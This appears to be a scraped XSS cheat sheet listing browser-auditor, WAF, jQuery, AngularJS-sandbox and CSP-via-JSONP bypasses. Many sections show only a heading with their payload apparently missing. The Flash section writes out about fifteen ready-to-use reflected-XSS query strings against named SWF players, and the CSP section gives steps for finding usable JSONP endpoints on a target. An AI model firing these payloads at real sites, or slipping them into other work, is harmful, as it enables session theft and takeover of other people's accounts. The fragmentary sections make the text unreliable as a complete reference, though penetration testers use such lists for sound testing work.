XSS
Chrome XSS-Auditor Bypass by @vivekchsm
Chrome < v60 beta XSS-Auditor Bypass
Other Chrome XSS-Auditor Bypasses
Safari XSS Vector by @mramydnei
XSS Polyglot by Ahmed Elsobky
Kona WAF (Akamai) Bypass
ModSecurity WAF Bypass Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
Wordfence XSS Bypasses
Incapsula WAF Bypasses by @i_bo0om
jQuery < 3.0.0 XSS by Egor Homakov
In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
Find any cross domain requests to untrusted domains which may inadvertently execute script.
Find any requests to trusted API endpoints where script can be injected into data sources.
URL verification bypasses (works without 	
too)
Markdown XSS
Flash SWF XSS
ZeroClipboard:
ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player:
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer:
Moxie.swf?target%g=confirm&uid%g=XSS
(also works withMoxie.cdn.swf
and other variants)FlashMediaElement:
flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS:
video-js.swf?readyFunction=confirm
andvideo-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
YUI "io.swf":
io.swf?yid=\"));}catch(e){alert(document.domain);}//
YUI "uploader.swf":
uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
Open Flash Chart:
open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo:
control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive:
/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//
and/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic):
banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy):
player.swf?playerready=alert(document.domain)
and/player.swf?tracecall=alert(document.domain)
SWFUpload 2.2.0.1:
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//
Uploadify (legacy):
uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
FlowPlayer 3.2.7:
flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
Note: Useful reference on constructing Flash-based XSS payloads available at MWR Labs.
Lightweight Markup Languages
RubyDoc (.rdoc)
Textile (.textile)
reStructuredText (.rst)
Unicode characters
AngularJS Template Injection based XSS
For manual verification on a live target, use angular.version
in your browser console
1.0.1 - 1.1.5 by Mario Heiderich (Cure53)
1.2.0 - 1.2.1 by Jan Horn (Google)
1.2.2 - 1.2.5 by Gareth Heyes (PortSwigger)
1.2.6 - 1.2.18 by Jan Horn (Google)
1.2.19 - 1.2.23 by Mathias Karlsson
1.2.24 - 1.2.29 by Gareth Heyes (PortSwigger)
1.3.0 by Gábor Molnár (Google)
1.3.1 - 1.3.2 by Gareth Heyes (PortSwigger)
1.3.3 - 1.3.18 by Gareth Heyes (PortSwigger)
1.3.19 by Gareth Heyes (PortSwigger)
1.3.20 by Gareth Heyes (PortSwigger)
1.4.0 - 1.4.9 by Gareth Heyes (PortSwigger)
1.5.0 - 1.5.8 by Ian Hickey
1.5.9 - 1.5.11 by Jan Horn (Google)
1.6.0+ (no Expression Sandbox) by Mario Heiderich (Cure53)
Content Security Policy (CSP) bypass via JSONP endpoints
Grab the target's CSP:
Either paste the CSP into https://csp-evaluator.withgoogle.com/ or just submit the target's address into the "Content Security Policy" field. The CSP Evaluator will notify you if one of the whitelisted domains has JSONP endpoints.
Now we can use a Google dork to find some JSONP endpoints on the domains listed above.
Last updated